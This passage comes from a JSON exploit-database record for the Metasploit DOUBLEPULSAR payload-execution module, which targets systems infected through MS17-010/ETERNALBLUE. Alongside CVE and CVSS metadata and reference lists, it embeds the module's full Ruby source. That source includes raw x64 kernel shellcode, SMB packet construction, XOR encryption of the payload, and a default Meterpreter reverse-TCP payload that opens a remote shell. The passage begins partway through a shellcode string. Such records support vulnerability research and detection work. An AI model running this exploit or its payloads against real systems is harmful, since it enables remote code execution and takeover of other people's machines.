\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n"}, "lastseen": "2021-11-11T00:00:44", "differentElements": ["sourceData"], "edition": 69}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "8bc0c205d41faf4fcc6b0513937f8e66", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-11-18T07:55:05", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0177", "CPAI-2017-0203", "CPAI-2017-0198", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-18T07:55:05", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-11-18T07:55:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": ""}, "lastseen": "2021-11-18T07:55:05", "differentElements": ["sourceData"], "edition": 70}], 
"viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": 
"cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96706", "SMNTC-96709", "SMNTC-96704"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0419"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": 
["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-18T10:01:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-18T10:01:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 
'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload', {}],\n ['Neutralize implant', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack('V').first\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n vprint_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n vprint_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n vprint_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = 
sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\n 
\"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\n 